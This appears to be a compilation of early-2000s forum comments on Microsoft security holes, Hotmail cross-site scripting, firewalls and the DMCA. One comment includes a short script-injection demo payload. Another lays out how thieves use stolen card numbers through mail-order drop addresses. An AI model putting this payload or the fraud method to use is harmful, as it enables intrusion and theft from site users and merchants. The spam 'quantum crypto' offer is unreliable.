I have a quantum crypto system available for making emails and efaxes unreadable by echelon. You could get the thought police out of your life easily, stand up to Big Brother!
email me if you want to be involved.
- Kaos games and encryption systems developer
Contains (somehow, not really sure how) the UNIX/Sadmind virus. At least our enterprise anti-virus software, Sophos Sweep detects that when I open the page. You guys might want to check out the links you supply with stories a little better. BTW, I still get the virus warning after the Veridian guys deleted the directory. Check it out at www.veridian.com/upload/ .
--- Think of it as evolution in action ---
Anyone? One has to wonder just WTF they do over there, no? This is starting to sound like the detox/rehab/wife beating world of family court. I mean there is what, a daily incident or problem where MS says - um yeah that's messed up too.
Name me another company that has this many security problems.
I hope he has the day off on Monday - someone should sponser him and he could do this 5 times a week!
My Karma was at 49, then they switched to words. All that work for nothing!
Really? How many security holes have YOU discovered, written corrective code for, recompiled your kernal and submitted the fix?
I'm willing to bet exactly 0.
All this talk of "having" the source doesn't do the average computer user ONE BIT OF GOOD.
Good for you that you have the source. Most people are still waiting for the fix to show up on their update sites.
Talk about the speed at which patches are available, don't imply that every computer user is also willing to be a code-debugger.
When did microsoft ever sue anyone for finding a hole in the OS?
I find tons of articles, researches and legit businesses in the us where the sole purpose is to research, discover, patch and fix these risks.
On the other hand, if you break copyright laws it doesn't matter which OS you do it under, it is still "illegal".. not that i agree with the DMCA but your blinded by your beliefs in linux as being a legal place to do illegal work
Try it.
The "source" is:
<script>
alert("This site has a cross-site scripting vulnerability!")
window.open("http://slashdot.org/")
</script>
You can be much more nasty with this, popping up goatse.cx or whatever. Basically, it's possible to do anything JavaScript allows you to do.
You are in a maze of twisty little relative jumps, all alike.
Any computer with a floppy disk or bootable CDRom is at risk.
(or even an ethernet bootable machine)
(or a machine on dhcp with anytype of nis/directory server authentication).
or...
STAC Electronics...IBM...Symantec...Apple Computer...Corel...need I go on...as long as you do the monkey dance and kiss Billy's ass and suborn the interests of your management and investors...in other words do itthe "Microsoft way" you get support. Once you speak up, differ in approach or start to talk about a more equal share of the attention/PR/money/whatever, you're screwed...just ask the above companies...
Remember guys, this is Amerika. Just because you have the most votes, doesn't mean you get to win.--Fox Mulder
this guy should upload the code to freenet where, hopefully, it is impossible to remove the program or discover the author. This is the exact kind of thing freenet was designed for, so if the author is out there in slashland, go for it! Civil Disobedience ra ra ra!
No. The whole point of civil disobedience is that a law or regulation is openly defied in a very public manner, and the transgressors challenge the authorities to enforce the law. The belief is that should the larger public become aware of the law and the inappropriate punishment that comes from breaking it, the government will feel compelled to change the law. As well, if enough people are openly breaking this law, the system will get clogged up with trivialities.
Civil disobedience is not hiding in the shadows and skulking around under cover of anonymity.
And this gets a +5 insightful? WTF?
*** Where are we going? And what's with this handbasket?
That link really gets my goat. 2 years ago (actually even a bit before that) I often discussed this kind of "universal login" system with people. Initially just coworkers, but later on a couple people in the VC community. In *EVERY* case, less than 30 seconds into the discussion, the question of "But how does it make money?" came up. Without a snazzy one-liner back, it was sunk. No "advertising" because it's a behind the scenes thing. No "licensing" because it was based on open standards. Hmmm... Whaddya do? So my thoughts got placed on the back burner, MS gobbled up someone (who was it?) already in that space (moderately successful at that time, but they'd started in the days when PR was more important than revenue) and morphed that into passport. Argh...
A packet filter is better than nothing, but it is not the answer. One should not assume that because they are "protected" by a packet filter that they are secure.
IMHO, I think that it can be argued that a proxy firewall solution is the most secure. With a proxy, there is no direct connection between a host on the secure network and the internet. The downside of course is that proxy solutions are not transparent.
The next best alternative would be a firewall that does stateful inspection. That is transparent to the user, but is not a secure as a proxy-based one.
*** Where are we going? And what's with this handbasket?
Bill, I don't think that word means what you think it does.
We're talking about making your users safe from hackers, not making your company safe from its users.
Hehe, oh wait, I remember MANY here saying that a security problem was quote "an invitation to enter and take/put" OK, welcome to my house sir.... don't mind the fact that your head will soon be disappearing in a spray of CSF, blood and brain matter. Oh wait, you have more rights to rob, tresspass and harm me in my OWN home than I have to defend myself thanks to the liberals, so don't be too surprised when you find out I happen to be able to kill you in a couple of seconds with an 'archaic' fighting skill
"On a path as clear as it is reliable"
...Certainly true: Zero equals zero.
"How many light bulbs does it take to change a person?" --BMcC-->
I agree with everything you said but I have a question about this:
Reason being is most of the security issues with M$ products stem from their desire to give users the so-called usability features that they scream for, usually at the expense of security.
Who asked for email attachments to launch automatically? Who asked for all processes to effectively run as root? Who asked IIS to install and run without the user being explicitly informed?
Who asked for any of these "features" on a desktop, much less a server?
I think the problem is that server and system administration is a non-trivial task, and m$ has tried to dumb-down administering an NT server to the point where anyone can do it.
Who needs to pay for a skilled, experienced SysAdmin when Joe from accounting can press the reset button whenever something goes wrong?
*** Where are we going? And what's with this handbasket?
IMHO, i think they *knew* what to do with it. they thought that their market position (and thus their power) translated into a general idea of acceptance of microsoft technology. they really thought they would be able to convince people that it was a good idea. i think they started questioning themselves with the latest barrage of criticisms (sp?) and the exposure of the security issues with MS technology.
they got carried away with a utopian view of the internet and the possibilities.
with the flack they're getting and with the sudden 'viability' or open-source (in the face of changing terms for MS liscencing) they are uncertain about the 'bet-the-farm' strategy. they don't want to push it too far.
IOW, they are scared of pushing things too far.
But would people actually fall for it?
It is best to keep your lies plausible and as close to the truth as possible.
Hopefully by the time the European answer to DMCA gets passed it will be so watered down and have so many exceptions that they wont have to go through this same stupidity.
BELIEVE
THE
LIE
I am Spartacus
The virus in question recently infected one of our servers running the ever-so-crappy IIS 4.0, despite being patched with the most recent Service Pack from Microsoft, as well as the security update to prevent Code Red. Apparently, the SP isn't as cumulative as it should be.....
I would much rather be running Apache, but our CRM application requires IIS for its extranet capabilities.
This negligence from Microsoft should be addressed with a class action lawsuit.
The fact is there isn't much use for stolen credit cards numbers. Now of course there is some use, but the bulk of things require the actual credit card. What are you gonna order something from ThinkGeek and have it delivered to your house? Make a couple long distance phone calls?
Wrong guess, -5. What you do with a stolen credit card number is mail-order expensive, easy-to-fence items from companies that are too clueless to notice that the credit card's billing address does not match the address of the drop site you have the stuff shipped to. Yes, such companies exist; yes, you can get a lot of valuables with very little risk if you only use the credit cards for a one day buying spree, and have the stuff shipped express to a drop address that you use once and don't go back to. After that, the credit card company's security department will notice something is wrong. Since the "victim" in credit card fraud is the merchant or credit card company, not the owner of the credit card, you are not in much danger of being charged even if someone figures out who you might be, since most merchants don't seem to pursue matters across state borders, but just eat the charge or the CC company eats the charge.
How do I know this? Someone got a hold of one of my credit card numbers early this year, and went on a mail-order buying spree with it. That's where I found out that I cannot press charges myself, as I am not the victim, officially. Go figure.
The thieves tried to order high-end cameras, professional audio equipment, pre-paid cell phones, boomboxes, and camping equipment. The pro audio business, the big department store, one of the big wireless companies, and the photo shop were clueful enough to call me for confirmation when the billing and shipping address did not match. They won; they didn't get defrauded. Unfortunately, the other big wireless company and the sports equipment catalog company were too stupid to bother; they lost. The sports equipment guys were really dumb; the fraudulent mail-order got sent out, returned with "no such address", and they sent it out again!
---dragoness
Unfortunately, I don't think most people would feel betrayed if their personal information was stolen from a Microsoft server, or any server. They would blame the hackers. The media profile of hackers is so high, and the profile of security experts is so low, that most people don't realise it's possible to secure your data against hackers, and they won't expect the system administrator to be held responsible if a hacker breaks into the system.
[Insert Your Favorite Redundant Anti-MS Propaganda Here]
Blog Prophyts - Right On, Man
This negligence from Microsoft should be addressed with a class action lawsuit.
...exept for the fact that you already clicked the "Accept" button.
"...NO WARRANTIES. Microsoft expressly disclaims any warranty for the SOFTWARE PRODUCT. The SOFTWARE PRODUCT and any related documentation is provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties or merchantability, fitness for a particular purpose, or noninfringement. The entire risk arising out of use or performance of the SOFTWARE PRODUCT remains with you."
Since when is an error page of type application/content-stream? It doesn't even display in my (Galeon) browser!
They just provided one-button mice and designed the interface accordingly.
Actually, this is not *quite* true. Macs do have two mouse buttons, the "other" mouse button is on the keyboard. In order to get context menu functionality, you press and hold the Control key and click the mouse button. It is functionally the same as a right click. In fact, my USB logitech mouse assigned the "Ctrl+click" to its right mouse button by default.
Since the Control key on my Mac has (to me) never been used for anything else, I have always considered it the "right mouse button."
If you don't want M$ to own internet identity management and authentication, you need to join the grassroots effort to support XNS (http://www.xns.org) now!
Ports 135,136,137,445:
Solution is to unbind the Microsoft client and server stuff from the network adapter. click click click, no firewall requried. While you are there, unbind everything else that you do not want running on a 'public' interface.
(You could try killing the 'server' and 'workstation' service but Windows doesn't necessarily like that. There also something you can do to make the RPC/SMB stuff safer - remove anon connections and require NTLM2, but it's still not solid.)
Q: Why does anyone bother with e-book encryption?
A: Profit
e-book encryption is not designed to stop dedicated "cracking" attempts. It's not even designed to slow it down. Think about it for a minute. These weak protections are there in conjuction with the DMCA to facilitate the licensingmuch cheaper to produce and distribute.
e-book encryption exists for the sole purpose of proping up an otherwise impossible business case. With physical media (i.e. a soft cover book) if I were to reproduce and distribute the books, I would not be able to sell them for less than the publisher, and still make any kind of a profit. The same is not true with el
"Most distros don't bother to require a login at the single user runlevel."
My Libranet Debian installation requires the root password once the system gets going, or you don't get access to the console shell.
The exploit that Jeremiah Grossman used to hack Hotmail in 1 line of code is cross-site scripting. Here is an interesting article by John Dvorak, about how it is IN Microsoft's interest to publicise the cross-site scripting vulnerability and try to scare internet users away from "promiscuous browsing"
www.whitehatsec.com
This is the site of the guy who quit yahoo a few months ago, started his own company, and found the problem. The print version of USA Today did mention this site and give kind of a rundown on how he did it in a separate article on page 2.
So, Hotmail was cracked in one line?
Easy to believe, if it was APL.
Mark
The clearance system sounds logical. It is not. It is completely arbitrary. -- John Bolton
You mean like Win2K Server and Win2K Professional?
Proof, if proof be needed, that Netscape engineers are weenies.
Of course the engineers at the companies working on this stuff know that their encryption will be hacked. They do it not to prevent hacking, but merely to make it less convenient.
What use is it to me if I put some data into Slashdot's log files? Can't I do that myself by just issuing the URL? Or am I missing something basic?
Yeah, Commodore invented the GUI, right. Those guys at Xerox must have copied it.
... stolen idea
... stolen idea
... stolen idea
... stolen idea
BTW,
Linux kernel
The basic GNU tools
X Windows
KDE interface
Need I go on?
It's not Redundant unless the moderators say it is.
I thought HTML scripting was safe... I mean, how can someone do something malicious with Javascript and all its limitations ?
Some nice gentleman from taiwan hacked my hotmail account about two months ago using the previous hotmail hack because yoyosoft just used a numeric counter in the paramters of the message in place of a real session id.
By chance I discovered that you can with a bit of minor browser knowledge-- tag mails to a hotmail account and , at the very least find out from where and when the tagged mail has been read. Great news for spammers. Because I am surely not the first one to use this doubleclick trick.
Umm, any computer at all is vulnerable. Remove the harddrive and plug it into another.
> Yeah, on a dual boot machine you can hax0r Linux in
> one line, by typing msdos at the LILO prompt.
You don't need a dual boot: just boot from a floppy or
from a rescue cdrom and do whatever you want with
root privileges.
Everybody can h4x0r a machine if {s}he has phisical
access to it. Network security is totally useless if your
system is not phisically secure.